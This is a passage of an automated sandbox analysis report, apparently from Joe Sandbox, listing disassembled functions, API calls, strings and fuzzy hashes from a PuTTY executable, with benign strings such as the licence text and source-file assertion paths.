                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                      • String ID: ?
                      • API String ID: 3458911817-1684325040
                      • Opcode ID: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
                      • Instruction ID: 85b948650445c3065e9d021df9df5a485ba06ae01d5336f0751fcce8f8bf9c80
                      • Opcode Fuzzy Hash: f20ff13d110c062c7a24faccda77cd1f8ebd87376358724fd8a91b8ccfae5989
                      • Instruction Fuzzy Hash: BB416133A282029AE750DF35D8814BA7F61BF48798B645135FA4EC7696DF3DE8009708
                      Function 00007FF6785F439F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend$LocalTimewcsftime
                      • String ID: %Y-%m-%d %H:%M:%S
                      • API String ID: 2023452587-819171244
                      • Opcode ID: 1b2cfc4d059b90b867368085179728438f370badff4484846818805fcb837780
                      • Instruction ID: 99867507031804a1321c19ce81aa0fa4bf696f4e2d699b7b43b057f1869e4aaa
                      • Opcode Fuzzy Hash: 1b2cfc4d059b90b867368085179728438f370badff4484846818805fcb837780
                      • Instruction Fuzzy Hash: 2E41A033A38A02A6F7509B34E85577A2B51FFA5750F644132DA4DC7B94CF2CF902AB08
                      Function 00007FF6785F9DF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ItemMessageSend
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/controls.c$c && c->ctrl->type == CTRL_LISTBOX$c->ctrl->listbox.height != 0
                      • API String ID: 3015471070-1665001371
                      • Opcode ID: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
                      • Instruction ID: 2398690ba68d274151f134a350863002b9a54a9b83f4d930887ced8c64ca236a
                      • Opcode Fuzzy Hash: b9bfb3989dc0ab2d47890ac25385cde08b85174cec19ee0b90f6dc49dabb0509
                      • Instruction Fuzzy Hash: 7631AB33A2491591FB608B2AD9087652B91FB94B98F654135CE1C87790DF3CDC55CB08
                      Function 00007FF67860F0F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: htonlinet_ntoa
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/network.c$<unknown>$addr->addresses && step.curraddr < addr->naddresses
                      • API String ID: 298042256-529704717
                      • Opcode ID: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
                      • Instruction ID: 3ae679579e11239782dc7084f70dc012acb252faaadacdae31e84a5aec12c9a3
                      • Opcode Fuzzy Hash: 438a5ba1e524eaa18862dbd65f4a01b488d93b2803a10fe3e36ee1f8c1a15f2d
                      • Instruction Fuzzy Hash: B321A563B38612A5FE10CB35D880A3A2B90AF58FC5F644135DD0D877D4DE3CE8029B08
                      Function 00007FF6785D1B30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 71windowCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CursorDestroyMessageShowWindow
                      • String ID: %s Exit Confirmation$Are you sure you want to close this session?%s%s
                      • API String ID: 1466741823-1096320758
                      • Opcode ID: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
                      • Instruction ID: 5416ad00346c302ac95f594f3f0001afecb3c11bbb2fb8b5361a5160474e641e
                      • Opcode Fuzzy Hash: 5babf984b154317977c6c952352b068deff14ff01d67093842571732cb045673
                      • Instruction Fuzzy Hash: 5E218D63E2D54764FA819B31A9853B61F91AF94BD0F744831CC0EC7792EE2CED42A718
                      Function 00007FF6785D6DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: FileView$CloseHandleUnmap
                      • String ID: %p:%u$Serialised configuration data was invalid
                      • API String ID: 2927507641-1340088990
                      • Opcode ID: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
                      • Instruction ID: f974b0c3e3e61e1caa71a16ac3e198d9476a62837ecc8558cb592829e6bdd1f9
                      • Opcode Fuzzy Hash: 9d57c90434684aaf2965970c8f0240be98aef44ae6faf4afbbb2f39bb53a8b90
                      • Instruction Fuzzy Hash: 93215332A29A8592FA50DB24F55436B6BA0EF85B80F705135EA8D87B58DF3CDC42CB44
                      Function 00007FF6785D19E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Caret$Window$BlinkCreateFlashProcShowTime
                      • String ID:
                      • API String ID: 3048652251-3916222277
                      • Opcode ID: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
                      • Instruction ID: 58351803ce997700527f08b72c9e602e51cc6ac49527d35263955bab4f2abf2b
                      • Opcode Fuzzy Hash: 7d8abb54fdfaeffb200c07e0e3071c8cc211ee267e447a3fee1c274b4c34ed4b
                      • Instruction Fuzzy Hash: 20216933A2D68295F6118B31E8593B62B50BF98B94F200431CE4DC77A5CF3CF985AB48
                      Function 00007FF67860E210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49fileCOMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: ErrorFileLast$CreateDelete
                      • String ID: Unable to delete '%s': %s
                      • API String ID: 3657518308-26304762
                      • Opcode ID: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
                      • Instruction ID: 53ae4ce2c05c7597cd605f2df171e1f0acf28edc84b941c0d9098033822658f8
                      • Opcode Fuzzy Hash: f88e35c732a831ebd537cab3597428dc8e72801e86ae3bdb86b7c1507d9bfd73
                      • Instruction Fuzzy Hash: A011C226B2861352E7546B34A94572F2A929B907B0F344334CD6AC2BD4DF2C8E419708
                      Function 00007FF6785F49A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      • %s Licence, xrefs: 00007FF6785F49C5
                      • PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso, xrefs: 00007FF6785F49E8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Text$DialogItemWindow
                      • String ID: %s Licence$PuTTY is copyright 1997-2024 Simon Tatham.Portions copyright Robert de Bath, Joris van Rantwijk, Delian Delchev, Andreas Schultz, Jeroen Massar, Wez Furlong, Nicolas Barry, Justin Bradford, Ben Harris, Malcolm Smith, Ahmad Khalifa, Markus Kuhn, Colin Watso
                      • API String ID: 4005798191-2223775202
                      • Opcode ID: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
                      • Instruction ID: 79a01cbcc68966ffb0fc32297be56595919f5ff9fbf92b59ea370bb2830656a6
                      • Opcode Fuzzy Hash: fd1f42abe3cd0209208851b7c1641d25dc7e0621b27556c9dd1169b445761683
                      • Instruction Fuzzy Hash: C8F0D122F2C45661FA945336E9445BA1A829F94BA0FB04031C82DC77D4DE6CEDC29B0C
                      Function 00007FF678698304 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressFreeHandleLibraryModuleProc
                      • String ID: CorExitProcess$mscoree.dll
                      • API String ID: 4061214504-1276376045
                      • Opcode ID: d6973e17bc496016cd4fb618cf7a3af109a9dec541e1302f7f85ba07df1fe5bb
                      • Instruction ID: 900c8c374e2123a7044cddf8eb7edf3bc505b3a65561f7f035cc5be323a9e780
                      • Opcode Fuzzy Hash: d6973e17bc496016cd4fb618cf7a3af109a9dec541e1302f7f85ba07df1fe5bb
                      • Instruction Fuzzy Hash: 62F06263A2970291EA108B74E85973B6B20FF58B61F640239D56EC56E4CF3CDD45EB08
                      Function 00007FF678649960 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 57COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: CriticalSection$CloseEnterHandleLeave
                      • String ID: /home/simon/mem/.build/workdirs/bob-0_vdcidh/putty/windows/handle-io.c$h && !h->u.g.moribund
                      • API String ID: 2394387412-2696147314
                      • Opcode ID: 6c1ea2d5d334a5474e2d3f7726b1849e4878d2696f3646d827d77fd05d616895
                      • Instruction ID: 94d477776a31dff4ea26b16f910ece9fcd9693c39f76b5c9f8d92f0cf11e94e9
                      • Opcode Fuzzy Hash: 6c1ea2d5d334a5474e2d3f7726b1849e4878d2696f3646d827d77fd05d616895
                      • Instruction Fuzzy Hash: EA217427A18641A2E735DB26F45427A7B60FB98754F140131CB8E826A1EF7CE9C5D308
                      Function 00007FF6786B8204 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: _set_statfp
                      • String ID:
                      • API String ID: 1156100317-0
                      • Opcode ID: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                      • Instruction ID: 2d8c90c6ff01d228633bb32624951238d5734e62cf4a054132f4b57a9aab2668
                      • Opcode Fuzzy Hash: c145aa9e71664b9ceaba139238ef165581b66b7f91f37de1a0b6c3f0234b5bc0
                      • Instruction Fuzzy Hash: 5A115B23E78E12A5FAA415B4D4533771C406F54BE9F38063CFA6E872D68E3CAC416298
                      Function 00007FF6786A32D8 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FlsGetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A32F7
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A3316
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A333E
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A334F
                      • FlsSetValue.KERNEL32(?,?,?,00007FF6786A48DF,?,?,00000000,00007FF6786A47F2,?,?,?,?,?,00007FF67868E97A), ref: 00007FF6786A3360
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      • Opcode ID: 246454f8cf3c1529ba939f3a27c3d7627f188343c35324c738e0a280999cbe11
                      • Instruction ID: c246b0f9f8744162d0827f84ba6fab78480cbcc25fb38faa1106ece8c828abdc
                      • Opcode Fuzzy Hash: 246454f8cf3c1529ba939f3a27c3d7627f188343c35324c738e0a280999cbe11
                      • Instruction Fuzzy Hash: 81117226E2C26261FA5893316A4217F19429F457F0F744339E93ED67D6DE2CEC01660A
                      Function 00007FF6786A316C Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A317D
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A319C
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31C4
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31D5
                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF678692CFB,?,?,?,00007FF67869C131), ref: 00007FF6786A31E6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: Value
                      • String ID:
                      • API String ID: 3702945584-0
                      • Opcode ID: 5f2370b3af674a94681810d456460f325ffb9ccdd21f5c8679402cd0e081159c
                      • Instruction ID: bdfc2b136364cb8d2a14139e3a1e11c133f3ccfd02ec3a6a6f99145c1e3fc442
                      • Opcode Fuzzy Hash: 5f2370b3af674a94681810d456460f325ffb9ccdd21f5c8679402cd0e081159c
                      • Instruction Fuzzy Hash: 9F113016A3821731F968A7755A530BB2D834F46370E740735D93ED56C2DD2CBC42760E
                      Function 00007FF67867AFA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 102libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF67867B043
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FD000.00000004.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678701000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767833752.00007FF678709000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767888943.00007FF67870D000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_7ff6785d0000_putty.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: %02x$CryptProtectMemory$crypt32.dll
                      • API String ID: 190572456-4241872374
                      • Opcode ID: 42bc7b198fba847b464cd3bf556528d318cb691e611eb5638657b73d3df5824d
                      • Instruction ID: cf78390f0caf6f56ff7a71e424c652bc86bb1ca4995a63082807d7d0fc8ce7a7
                      • Opcode Fuzzy Hash: 42bc7b198fba847b464cd3bf556528d318cb691e611eb5638657b73d3df5824d
                      • Instruction Fuzzy Hash: CD41E313F2CA4261FE109B36A8503BB6B91AF95BC4F644035CD4DD7796EE2CEC46A708
                      Function 00007FF678605140 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 66COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2767618747.00007FF6785D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF6785D0000, based on PE: true
                      • Associated: 0000000C.00000002.2767592968.00007FF6785D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767723715.00007FF6786BA000.00000002.00000001.01000000.0000000E.sdmpDownload File
                      • Associated: 0000000C.00000002.2767778885.00007FF6786FB000.00000004.00000001.01000000.0000000E.sdmpDownload File
